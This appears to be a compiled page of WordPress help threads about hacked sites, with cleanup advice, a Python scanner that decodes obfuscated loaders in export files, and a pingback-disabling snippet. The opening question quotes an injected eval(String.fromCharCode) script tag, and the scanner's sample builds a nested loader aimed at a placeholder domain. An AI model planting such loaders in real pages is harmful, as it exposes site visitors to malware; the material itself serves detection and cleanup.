How does a virus infect my WordPress site? - wordpress

For the second time, I'm removing the malware injection from the posts on my WordPress site:
<script type=text/javascript>eval(String.fromCharCode(...));</script> [long obfuscated character-code payload omitted]
This code was inside every post.
Using the plugin Better Search Replace, I deleted all found inserts from all posts. No inserts were found in other database tables.
I checked the site for viruses using various plugins, such as Wordfence, etc. No infections were found.
Only I work on the sites. My computer is well protected. I checked it with different anti-virus scanners - everything is clean!
I tried to find modified WordPress files as well as plugins. Clean! No suspicious files were found!
How can I find the cause of the infection?

There are 2 reasons why you are not able to remove the jar.trafficbetter.biz malware from your WordPress site:
1. You are using an old, outdated nulled theme/child theme on your WordPress site.
2. The code was SQL-injected into your database, and the code is being populated on your site again and again.
These are a clever piece of code and cannot be detected by any antivirus. If you want to know what the code is doing, use the following link:
https://blog.sucuri.net/2017/04/wordpress-security-unwanted-redirects-via-infected-javascript-files.html
So to solve the problem, change or update your theme to the latest version.
Back up your database, and then search for the script in the database and remove the entry.

Related

The whole wordpress website got RESET

My WordPress blog was working perfectly fine until one day when my blog suddenly went down. All I could see was a blank white page. I still don't know the reason.
Initially, I was able to figure out the debug messages, which were some compatibility issues between the prototype of the function Walker() and some theme function extending Walker(). So I somehow managed to resolve those issues by changing the theme function's prototype.
But I could still only view a blank page without any error. Then I went through my child theme files and found that there was some PHP code written to upload an image file in the child theme's style.css. Fortunately, I had a backup of my blog, so I restored my child style.css.
After so many efforts, I still couldn't restore my complete blog.
Although all the posts and everything are there in the DB, I can't see any posts on my blog or in the admin panel. It seems that the categories I created are no longer there in the admin panel since I restored the theme.
Can anyone please help me find out:
Why did it happen, and how did my blog get reset?
How can I restore my blog and reflect all my posts from the DB to the admin panel & blog?
It looks like somebody hacked you and edited some files on your server.
WordPress actually doesn't offer any backup features, but most web hosting services have a backup option, so you might consider that.
Or, if your WordPress database is still in place as before, then the likely cause is that your WordPress core files were corrupted or edited by someone. So you might consider deleting your WordPress installation and reinstalling it (without deleting your database). This would not affect your blog at all, because all WordPress information is stored in the database. But remember to back up the files in the wp-content folder and copy them to your new installation.

How to search files for signs of a code injection

Hi, the website of a friend was hacked.
Many files had code injected into them. His programmer deleted all of these.
Now the situation is that the site (WordPress with a shop plugin) is still running really slowly sometimes. Sometimes it is fast.
After searching the web for "troubleshooting code injections", "find code injections" and the like, I have no idea how to troubleshoot the problem, because his programmer has no local backup and changed all the files, so I can't look for recently changed files at all.
What would be the preferred way to find the problem?
Possible solution or suggestions:
Use these very famous virus scanning and detection websites.
By using the above sites you will come to know whether the virus still exists or not.
Suggestions:
As you said you are using WordPress, it will be very easy to detect the virus. How?
Use the following security plugins for scanning core files:
All In One WP Security & Firewall
Wordfence
Lastly:
Hackers' malware usually lives in the following important WordPress files.
Check all theme files, especially:
header.php
footer.php
index.php (mostly infected)
Also upgrade WordPress, so you can be sure that the core files are not modified.
Thanks,
hope it helps.

Posts disappearing and reappearing on wordpress

I have a WordPress site which has been acting strangely lately. It seems like the database is spontaneously rolling back a few hours from time to time. I have noticed it happen at least four times.
When I updated to WordPress 3.5, after a short time, maybe 30-60 minutes, I noticed the nag to upgrade was back. I ran the upgrade a second time, even though I was certain that I had already upgraded.
I added a new category and changed a widget on one of my sidebars, only to find that my changes were gone the next day and I had to redo them.
I added a post yesterday, linked to it in various places and then returned several hours later to find the post missing. I rewrote the post from memory and put it back on the site.
This morning when I went to the site, the original post was back and the one that I had recreated from memory was gone. The post's id number was the same as the previous day. I think there was also a draft post that disappeared and reappeared as well.
One last clue which may or may not be related is that when I go to a page on the blog that should generate a 404 message I get a single piece of text which says: "defaced by t3ll0" I noticed this recently, within the last few weeks. I'm not sure how long it has been like that.
I ran Sucuri Scanner, and it found no evidence of malware. Any suggestions on how to troubleshoot this? Could this be a problem with my database rather than WordPress?
UPDATE: It appears that the primary problem I was noticing was because of two versions of the site being up simultaneously. The DNS settings had not been updated to the new site. I'm still investigating if the site was hacked.
You got hacked. "defaced by t3ll0" is the clue. Someone has control of your site and your hosting account.
Work your way through these resources and follow all instructions to completely clean your site or you may be hacked again. See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex.
Change all passwords. Scan your own PC for spyware that may have grabbed your login and password.
http://sitecheck.sucuri.net/ is a good resource, but it scans for malware and not accounts that were hacked and are not being used to distribute malware or have spam links.
Tell your web host you got hacked, and consider changing to a more secure host: Recommended WordPress Web Hosting
You may not have applied security in a number of places:
1. File permissions, folder permissions.
2. Upload folder permissions.
3. Execute permissions.
Now, if you are not a developer how would you check for these vulnerabilities?
I suggest you take a backup of your DB (export it). Get rid of the existing WP core and reinstall it fresh.
Delete all plugins and install them all fresh from trusted sources.
If you used a custom theme, restore the backed-up version and delete the current one, as it has been defaced.
And you can check for a lot of vulnerabilities with plugins like this: http://wordpress.org/extend/plugins/better-wp-security/
Rename your administrator account. Harden your password. Remove write permission from .htaccess and wp-config.php file.

Meta Description Shows Spam

I have a website (thebyandby.com) that got hacked several weeks ago. The problem is, the description on Google is showing a spam description for viagra, and one of the most popular posts (when linked to from Google) goes to a spam website.
The site is a WordPress website, so I reinstalled the theme and made sure everything was updated. There are only two plugins installed, Akismet and Google Analytics. I don't think the plugins could be affected, but I am not sure. The problem was still there, so I checked when Google last indexed my site, and it was after I had reinstalled my theme. I checked for malware from Google Webmaster and it said it didn't find any malware. I ran grep -r "viagra" on my entire web directory and nothing was found. I really don't know what else to do. Could this be a database problem?
Yes, it could well be that you have content in the database which is compromised. After all, that's where all the pages and posts are stored. Does your hosting company provide a tool like phpMyAdmin for browsing and editing the database?
But equally, if you have only reinstalled the theme then there are a lot more core WordPress files that could have been compromised by the hacker. Given that you are having problems, it would be well worth doing a complete reinstall of the WordPress files. Just make sure you keep a copy of your wp-config file, as you will need to copy that back. Also make sure you reinstall the same version of WordPress that you currently have.
But you know what: It may save you time in the long-run to just export all your posts and pages from within WordPress and then wipe the hacked site completely and install the whole thing from scratch. You can open the export file in any decent editor and once you've got your head around the XML structure, you can delete any rubbish that the hacker put there. I guess this option depends on how much content you had already put up on the site and how readily you could reconfigure the new site to match the old one.
Of course, if you have a full backup of the files and database from before the hacker got there, then you have an easy option that avoids all this grief ;-)
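A scanner for the database-resident infections discussed in the first question (an obfuscated eval(String.fromCharCode(...)) loader injected into every post) and in this answer (spam content stored in posts rather than in files, which grep over the web directory never sees). Added example, not code from any of the posts: it walks a WordPress WXR export, decodes the character codes so the loader's real target becomes readable, and flags spam keywords; the export and the loader.example.invalid domain are constructed.

```python
import re
import xml.etree.ElementTree as ET

NS = {"content": "http://purl.org/rss/1.0/modules/content/",  # WXR namespaces
      "wp": "http://wordpress.org/export/1.2/"}
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.S | re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>;)]+")
SPAM_WORDS = ("viagra", "cialis", "casino")

def decode_charcodes(js: str, max_rounds: int = 5) -> str:
    """Replace String.fromCharCode(...) calls with the text they build.
    Loaders nest the calls, so repeat until the output stops changing."""
    for _ in range(max_rounds):
        decoded = CHARCODE_RE.sub(lambda m: "".join(
            chr(int(n)) for n in m.group(1).split(",") if n.strip()), js)
        if decoded == js:
            break
        js = decoded
    return js
def scan_post(content: str) -> dict:
    """Flag obfuscated <script> blocks and spam keywords in one post body."""
    findings = {"scripts": [], "urls": [], "spam": []}
    for tag in SCRIPT_RE.findall(content):
        if "fromCharCode" in tag or "eval(" in tag:
            decoded = decode_charcodes(tag)
            findings["scripts"].append(decoded)
            findings["urls"].extend(URL_RE.findall(decoded))
    findings["spam"] = [w for w in SPAM_WORDS if w in content.lower()]
    return findings
def scan_wxr(xml_text: str) -> dict:
    """Return {post_id: findings} for every export item with a finding."""
    report = {}
    for item in ET.fromstring(xml_text).iter("item"):
        pid = item.findtext("wp:post_id", namespaces=NS)
        body = item.findtext("content:encoded", default="", namespaces=NS)
        findings = scan_post(body)
        if any(findings.values()):
            report[pid] = findings
    return report
def _to_charcodes(s: str) -> str:  # only used to build the constructed sample
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"

# Constructed WXR export: a clean post and one with a nested loader pointing
# at the placeholder domain loader.example.invalid (not a real host).
_INNER = "var u = " + _to_charcodes("https://loader.example.invalid/s.js") + ";"
SAMPLE_WXR = f"""<rss xmlns:content="{NS['content']}" xmlns:wp="{NS['wp']}"><channel>
<item><wp:post_id>1</wp:post_id><content:encoded><![CDATA[<p>Clean post.</p>]]></content:encoded></item>
<item><wp:post_id>2</wp:post_id><content:encoded><![CDATA[<p>Hello.</p>
<script type=text/javascript>eval({_to_charcodes(_INNER)});</script>]]></content:encoded></item>
</channel></rss>"""
```

Run it against a real export with `scan_wxr(open("export.xml").read())`; the decoded script text shows what a loader actually fetches, which is the URL to block and the string to search the database for.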

Wordpress Security Malicious Software

My WordPress site has been working fine (it is updated), and then this morning I got a warning from Google about visiting my site. When I clicked on the details I got the message below. I went and disabled my comments altogether and deleted plugins that I think might have caused it. I am unsure what else to do. I need help: what should I do now? Thank you for your time to hear my case!
What happened when Google visited this site?
Of the 7 pages we tested on the site over the past 90 days, 7 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-03-07, and the last time suspicious content was found on this site was on 2012-03-07.
Malicious software is hosted on 1 domain(s), including happynewyear.osa.pl/.
This site was hosted on 1 network(s) including AS29873 (BIZLAND).
You need to be sure you completely clean your site to fix the hack, i.e. replace all core WP files and folders, check theme files for php code and links, etc. Replacing plugins and disabling comments is not enough.
Use http://sitecheck.sucuri.net/ and see FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex and tell your host. Change all passwords. Scan your own PC. You may need to consider changing web hosts, too, in order to find a more secure host.
You will find many tips there about WordPress hacks and how to clean them up:
Many Wordpress Tips After Hack
But you will get many different tips about it ... just try to do your best with this website and using Google is the best way to clean it.
The important thing to remember is that any and every PHP file and all of the stored procedures of the database are now contaminated and need to be deleted. If any passwords were stored in the clear (such as login passwords) you'll need to change them too.
Once you've wiped all of those, you'll need to install a fresh copy of WordPress - and let this be a lesson to you to keep your WordPress up to date and to have as few plugins as possible on your site.
// Remove the pingback.ping method from XML-RPC; pingbacks have been abused
// to turn WordPress sites into DDoS reflectors against third parties.
add_filter( 'xmlrpc_methods', function( $methods ) {
    unset( $methods['pingback.ping'] );
    return $methods;
} );
Security researchers have uncovered a recent distributed denial-of-service (DDoS) attack that used at least 162,000 WordPress-powered websites to knock another site offline.